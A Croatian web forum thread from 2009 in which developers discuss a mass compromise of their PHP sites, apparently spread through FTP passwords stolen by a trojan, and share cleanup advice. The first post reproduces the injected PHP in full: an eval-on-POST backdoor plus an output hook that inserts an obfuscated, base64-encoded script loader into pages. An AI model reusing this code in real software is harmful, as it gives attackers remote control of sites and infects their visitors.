View previous topic :: View next topic |
Author |
Message |
LifeCanBeFun
Joined: 28 Apr 2006 Posts: 228 Location: Istra
|
Posted: 16.04.2009 23:41 Post subject: Izmjenjeni fileovi-hakerski napad |
|
|
Danas sam slučajno primjetio da mi se na index.php fileu jednog weba na vrh dodao slijedeći kod
Code: | <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',
base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3
VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY2xOQnJpcHRrMVMlMjBzcmNCdyUzRCU
yRkhoZiUyRmxOQjk0JTJFMjRJYzclMkVlbzIlMkUxOUhoZjVadVIlMkZxTTJqcXVlcnlsTkIlMk
VqcU0yc2syJTNFJTNDWnVSJTJGSGhmc2NCd3JpcHQlM0UnKS5yZXBsYWNlKC9Cd3x
JY3xadVJ8ZW98azJ8SGhmfGsxU3xsTkJ8cU0yfGNpL2csIiIpKTsKIC0tPjwvc2NyaXB0
Pg=='));function tmp_lkojfghx($s){if($g=substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#
<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,)
{20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||
($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script
language=javascript><!-- \ndocument\.write\(unescape\(.+?\n
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#
(\s*<body)#mi',TMP_XHGFJOKL.'
\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i]
[0]);echo $s[$i]
[1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2(); ?> |
nije mi bilo jasno pa sam otiša pogledati dalje i vidim da je na svim webovima u paketu (nekih 10-ak) isto... 15.4. oko 19 sati izmjenjeni su vecinom index, login, functions, js-ovi i slicni fileovi..
zovemo avalon i oni kazu da ce vratiti backup od prije dva dana al mislim da bi se ista stvar mogla ponoviti...
trazio sam po forumima al svi govore drugu stvar... neki da je stvar do hostinga, neki da je problem u spyware koji krade lozinke...
ovo je inace hostano na avalonu...
da li mozda netko imao slican problem? |
_________________ www.netlex.hr |
|
Back to top |
|
|
studioinvent
Joined: 09 Sep 2008 Posts: 9
|
Posted: 16.04.2009 23:52 Post subject: |
|
|
backup će ti rješiti stvari trenutno ali ne zadugo.... to su ti spyware-i koji crawaju site i traže propuste u security-u...
kad tad će se to opet desit ako ne pronađeš gdje je bio propust i ispraviš ga...
propust ti može biti u lošoj lozinki CMS-a pa kroz FCK editor uploadaju neku glupost...
možda ti je ftp lozinka neka week... ovisi... treba pogledat logove na serveru... |
|
|
Back to top |
|
|
fakz
Joined: 08 Sep 2003 Posts: 384 Location: Rijeka
|
Posted: 17.04.2009 10:32 Post subject: |
|
|
Svakako prvo promijeni pass za FTP (ili -ove), a onda prodji svoj komp sa nekim antivirusom, da eliminiras mogucnost da ti je neki trojan ukrao ftp podatke. A onda tek provjeri propuste u kodu ... |
_________________ "It is through the hottest fires comes the hardest steel"
Conan the Barbarian |
|
Back to top |
|
|
/dev/null
Joined: 22 Dec 2004 Posts: 144
|
Posted: 18.04.2009 10:08 Post subject: |
|
|
ajoj to je neki dosadni spyware koji ocito snifa FTP saobracaj i dodaje odredjeni code u PHP (vjerovatno samo ako je transfer type ASCII). E sad da stvar bude bolja, taj PHP code edituje odredjene HTML i JS fajlove i ubacuje takodje code. Taj code opet kontaktira preko JSa neke stranice u pizdi maternoj i poskusava da iskoristi neki propust u browserima i zarazi jos vise racunara. Zarazena stranica koliko sam primjetio ubije FF na windowsima, a na linuxu nista, koda ga i nema. Za IE neam pojma.
Uglavnom, taj jebeni crv je toliko smoran da je to bruka. Men je umro komp nekidan i ja sam uzo prvi u firmi koji nije nist radio i nastavio da radim. Trebam li reci da je taj komp piciio na windowsu i da je bio prepun smeca. To govno crvavo mi je zarazilo 5 projekata (zivih online) i jedno 500 raznih fajlova koje sam moro pjeske popravljat. Izgubio sam citav jebeni radni dan zbog njega. Mjenja sve *funcion*, *conf*, *index* etc .php fajlove, sve *index* html fajlove i ne znam kako bira *js fajlove, al mislim da ih je bilo more zarazenih.
Et, toliko. |
|
|
Back to top |
|
|
Tristan
Joined: 01 Aug 2006 Posts: 614 Location: Under the sky
|
Posted: 18.04.2009 13:28 Post subject: |
|
|
I nama su također siteovi bili napadnuti, nakon čega sam provjeravao permissione i shvatio da nije u njima problem. Kasnije su javili sa servera i poslali nam logove, radi se o promjeni fileova putem ftp-a. |
_________________ Carpe diem... |
|
Back to top |
|
|
LifeCanBeFun
Joined: 28 Apr 2006 Posts: 228 Location: Istra
|
Posted: 18.04.2009 22:17 Post subject: |
|
|
evo nakon 2 dana gotovo svi webovi koje na kojima sam radio su zaraženi...
problema ne fali... promjenio sam sve moguće passworde, imam hrpu papirića, ne želim passove u komp pisat, stalno zovemo plus i avalon za backup...
trenutno radim na starom kompu i pripremamo se na formatiranje radnog... inace imam nod32, spybot, ad aware... al nis nisu pomogli...
a sto je najgore opet necu biti siguran ce to rjesiti problem kad reinstaliram masinu...
simptomi su isti kao kod /dev/null-a
@/dev/null
Kako si rješio problem? Formatirao komp ili ga bacio kroz prozor? |
_________________ www.netlex.hr |
|
Back to top |
|
|
Adrian
Joined: 02 Apr 2004 Posts: 692 Location: Around & about
|
Posted: 18.04.2009 22:31 Post subject: |
|
|
Iz mog iskustva, vjerojatno je nečiji privatni komp zaražen, trojan pokupi passove za ftp i mjenja datoteke.
Prva preporuka - Kaspersky.
Nedavno je jedan od mojih kolega dobio virus na xp koji mu je mjenjao sve server side izvršive datoteke na kompu, milijon toga je zarazio pa je morao formatirati komp. Iako nije isti ovaj virus, sličan je, no nod ga nije skužio uopće. Navodno ga jedino Kaspersky vidi, al ga isto ne zna očistit.
Druga preporuka - kad ste isformatirali kompove, pregledali i sve to, onda promjeniti sve lozinke za accounte.
Treća preporuka - Mac ili Linux. |
_________________ The quest for certainty blocks the search for meaning. Uncertainty is the very condition to impel a man to unfold his powers.
http://origami.hr |
|
Back to top |
|
|
vtonline
Joined: 06 Apr 2008 Posts: 13
|
Posted: 19.04.2009 13:05 Post subject: |
|
|
Kod nas je 30 sitova zaraženo. Riječ je o ubacivanju iframe-a u index (php i html) i home filove po svim mapama.
Sitove hostamo kod Fiuhosta, Plusa i Hosting centra. Ekipa Fiuhosta je jučer zajedno s nama cijelo popodne pa sve do sitnih jutarnjih sati spašavala stvar. Stvarno, dečkima svaka čast. Iframove su čistili i ručno i backupovima.
Na Hosting centru među ostalima hostamo regionalni portal Virovitica.info čiji je kod izmasakriran. Ima nekoliko stotina zaraženih filova. Backup na žalost ne možemo napraviti jer hosting provider ima backup tek od siječnja. Ja jednostavno ne mogu vjerovati! Da li i ostali provideri ne rade redovite backupove? |
|
|
Back to top |
|
|
LifeCanBeFun
Joined: 28 Apr 2006 Posts: 228 Location: Istra
|
|
Back to top |
|
|
ska
Joined: 08 Oct 2003 Posts: 402
|
Posted: 19.04.2009 14:08 Post subject: |
|
|
Nažalost, nisu samo virusi problem u svakodnevnom radu... ima tu udara struje, redovnog crkavanja opreme, krađe i sl. bez obzira na opremu i OS.
Teško je biti pametan kada se takvo što desi... zato treba biti pametniji prije toga... |
_________________ ska |
|
Back to top |
|
|
Adrian
Joined: 02 Apr 2004 Posts: 692 Location: Around & about
|
Posted: 19.04.2009 18:40 Post subject: |
|
|
Nažalost, mi nismo uspjeli naći nikakvo ime... |
_________________ The quest for certainty blocks the search for meaning. Uncertainty is the very condition to impel a man to unfold his powers.
http://origami.hr |
|
Back to top |
|
|
/dev/null
Joined: 22 Dec 2004 Posts: 144
|
Posted: 21.04.2009 08:18 Post subject: |
|
|
Baci sam komp kroz prozor i formatiro ga :}
Rjesio sam tako sto sam sino sorsove projekata na HDD, koristeci pretrage fajlova u projektu skino sav los JS,PHP,HTML code.
Komp koji je bio zarazen nije moj, neg sam ga koristio "samo da se posluzim", dok je moj na servisu - i stvarno mi je pravo dobro posluzio. |
|
|
Back to top |
|
|
|